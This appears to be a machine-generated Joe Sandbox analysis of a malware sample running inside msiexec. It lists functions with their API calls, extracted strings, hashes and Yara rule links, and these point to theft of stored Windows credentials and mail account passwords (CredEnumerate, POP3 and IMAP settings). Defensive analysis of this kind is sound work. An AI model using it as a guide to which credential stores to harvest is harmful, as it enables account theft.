                                                                            • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                            • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                            • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                            Function 00410034 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$Library$FreeLoad
                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                            • API String ID: 2449869053-232097475
                                                                            • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                            • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                            • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                            • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                            Function 0040955A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • sprintf.MSVCRT ref: 0040957B
                                                                            • LoadMenuA.USER32(?,?), ref: 00409589
                                                                              • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                              • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                              • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                              • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                            • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                            • sprintf.MSVCRT ref: 004095EB
                                                                            • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                            • memset.MSVCRT ref: 0040961C
                                                                            • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                            • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                            • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                            • String ID: caption$dialog_%d$menu_%d
                                                                            • API String ID: 3259144588-3822380221
                                                                            • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                            • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                            • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                            • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                            Function 004045DB Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                            • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                            • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                            • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                            • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                            • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$Library$FreeLoad
                                                                            • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                            • API String ID: 2449869053-4258758744
                                                                            • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                            • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                            • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                            • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                            Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • wcsstr.MSVCRT ref: 0040426A
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                            • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                            • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                            • strchr.MSVCRT ref: 004042F6
                                                                            • strlen.MSVCRT ref: 0040430A
                                                                            • sprintf.MSVCRT ref: 0040432B
                                                                            • strchr.MSVCRT ref: 0040433C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                            • String ID: %s@gmail.com$www.google.com
                                                                            • API String ID: 3866421160-4070641962
                                                                            • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                            • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                            • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                            • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                            Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                            • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                            • API String ID: 2360744853-2229823034
                                                                            • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                            • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                            • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                            • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                            Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • strchr.MSVCRT ref: 004100E4
                                                                            • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                              • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                              • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                            • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                            • _mbscat.MSVCRT ref: 0041014D
                                                                            • memset.MSVCRT ref: 00410129
                                                                              • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                              • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                            • memset.MSVCRT ref: 00410171
                                                                            • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                            • _mbscat.MSVCRT ref: 00410197
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                            • String ID: \systemroot
                                                                            • API String ID: 912701516-1821301763
                                                                            • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                            • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                            • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                            • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                            Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                            • strchr.MSVCRT ref: 0040327B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringstrchr
                                                                            • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                            • API String ID: 1348940319-1729847305
                                                                            • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                            • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                            • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                            • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                            Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                            • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                            • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                            • API String ID: 3510742995-3273207271
                                                                            • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                            • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                            • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                            • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                            Function 0040F460 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 180registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040F567
                                                                            • memset.MSVCRT ref: 0040F57F
                                                                              • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                            • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                            • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                                                                            • String ID:
                                                                            • API String ID: 78143705-3916222277
                                                                            • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                            • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                            • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                            • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                                            Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004094C8
                                                                            • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                            • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                            • memset.MSVCRT ref: 0040950C
                                                                            • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                            • _strcmpi.MSVCRT ref: 00409531
                                                                              • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                            • String ID: sysdatetimepick32
                                                                            • API String ID: 3411445237-4169760276
                                                                            • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                            • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                            • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                            • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                            Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00403504
                                                                            • memset.MSVCRT ref: 0040351A
                                                                            • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                            • _mbscat.MSVCRT ref: 0040356D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscatmemset$_mbscpystrlen
                                                                            • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                            • API String ID: 632640181-966475738
                                                                            • Opcode ID: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                            • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                            • Opcode Fuzzy Hash: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                            • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                            Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                            • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                            • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                            • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                            • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                            • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                            • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                            • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                            • String ID:
                                                                            • API String ID: 3642520215-0
                                                                            • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                            • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                            • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                            • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                            Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                            • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                            • GetDC.USER32(00000000), ref: 004072FB
                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                            • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                            • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                            • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                            • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                            • String ID:
                                                                            • API String ID: 1999381814-0
                                                                            • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                            • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                            • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                            • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                            Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpymemset
                                                                            • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                            • API String ID: 1297977491-3883738016
                                                                            • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                            • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                            • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                            • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                            Function 0041230B Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm$__aullrem
                                                                            • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                            • API String ID: 643879872-978417875
                                                                            • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                            • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                            • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                            • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                            Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040810E
                                                                              • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                              • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                            • LocalFree.KERNEL32(?,?,?,?,?,00000000,679D7B60,?), ref: 004081B9
                                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                            • String ID: POP3_credentials$POP3_host$POP3_name
                                                                            • API String ID: 524865279-2190619648
                                                                            • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                            • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                            • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                            • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                            Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMenu$CountInfomemsetstrchr
                                                                            • String ID: 0$6
                                                                            • API String ID: 2300387033-3849865405
                                                                            • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                            • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                            • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                            • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                            Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscat$memsetsprintf
                                                                            • String ID: %2.2X
                                                                            • API String ID: 125969286-791839006
                                                                            • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                            • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                            • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                            • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                            Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                            • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                              • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                              • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
